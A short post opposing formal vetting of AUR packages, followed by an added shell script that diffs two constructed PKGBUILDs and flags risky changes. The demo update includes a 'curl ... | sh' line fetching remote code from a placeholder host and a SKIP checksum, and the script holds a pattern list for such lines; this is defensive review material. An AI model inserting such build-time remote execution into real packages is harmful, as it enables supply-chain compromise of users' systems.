The expectation of the AUR is that users vet upstream software, and read the PKGBUILD, right? If you do this, none of the malicious packages I've seen would have affected you. I worry building any kind of formal vetting or reputation system for AUR packages will look like a de facto endorsement of the packages themselves, which I don't think we're trying to do.
Correct me if I'm missing something, but I don't see the value in anything past letting your AUR helper show you diffs, which the ones I've used all do. Anything else we do raises the barrier for community AUR contributions, and won't provide meaningful warranty or security.

Mark
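
The "read the diff before you build" review the post describes, as an added example that is not part of the thread and not code from any AUR helper: it diffs two PKGBUILDs the way a helper's diff view does and flags the added lines a reviewer should stop at (new sources, a SKIP checksum, code fetched and executed at build time). Both PKGBUILDs are constructed for the demo; the package name and URLs are hypothetical.

```shell
#!/bin/sh
# Added example, not code from this thread or from any AUR helper: review a
# PKGBUILD update by hand the way a helper's diff view lets you, and flag the
# added lines a reviewer should stop at. Both PKGBUILDs below are constructed
# for the demo; the package and URLs are hypothetical.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# The PKGBUILD you built from last time.
cat > "$WORK/PKGBUILD.old" <<'EOF'
pkgname=examplepkg
pkgver=1.0
pkgrel=1
source=("https://example.org/examplepkg-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$pkgname-$pkgver"
  make
}
EOF

# The update: a version bump, plus a second source, a SKIP checksum and a
# curl | sh in build(). These are the kinds of changes a diff makes visible.
cat > "$WORK/PKGBUILD.new" <<'EOF'
pkgname=examplepkg
pkgver=1.1
pkgrel=1
source=("https://example.org/examplepkg-1.1.tar.gz"
        "https://paste.example.net/raw/helper.sh")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111'
            'SKIP')
build() {
  cd "$pkgname-$pkgver"
  curl -s https://paste.example.net/raw/setup.sh | sh
  make
}
EOF

# pkgbuild_diff OLD NEW: the unified diff, which is what a helper shows you.
# Always returns 0 (diff itself returns 1 when the files differ).
pkgbuild_diff() {
    diff -u "$1" "$2" || true
}

# flag_pkgbuild_changes OLD NEW: print one FLAG line per added line that
# fetches or runs code at build time, disables checksum verification, or
# changes where sources come from. Changed lines appear as added lines too.
flag_pkgbuild_changes() {
    pkgbuild_diff "$1" "$2" | grep '^+' | grep -v '^+++' | sed 's/^+//' |
    while IFS= read -r line; do
        case "$line" in
            *'curl '*|*'wget '*|*'| sh'*|*'| bash'*|*'eval '*)
                echo "FLAG fetches or executes code at build time: $line" ;;
            *SKIP*)
                echo "FLAG checksum verification disabled: $line" ;;
            *source=*|*'https://'*|*'http://'*|*'git+'*)
                echo "FLAG source/URL changed or added: $line" ;;
        esac
    done
}

# count_flags OLD NEW: number of flagged lines (0 means nothing matched the
# heuristics, which is not the same as the diff being safe).
count_flags() {
    flag_pkgbuild_changes "$1" "$2" | grep -c '^FLAG' || true
}

# Stand-alone run: show the diff, then the flags, then the verdict.
pkgbuild_diff "$WORK/PKGBUILD.old" "$WORK/PKGBUILD.new"
flag_pkgbuild_changes "$WORK/PKGBUILD.old" "$WORK/PKGBUILD.new"
if [ "$(count_flags "$WORK/PKGBUILD.old" "$WORK/PKGBUILD.new")" -eq 0 ]; then
    echo "no risky additions flagged; still read the whole PKGBUILD"
else
    echo "review the flagged lines before building"
fi
```

On a real package the two inputs are the PKGBUILD you last built from and the one in the freshly pulled AUR clone. The pattern match is triage only: it points at the lines that most often hide a problem, but it does not replace reading the whole PKGBUILD, which is the vetting the post says the AUR already expects of users.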
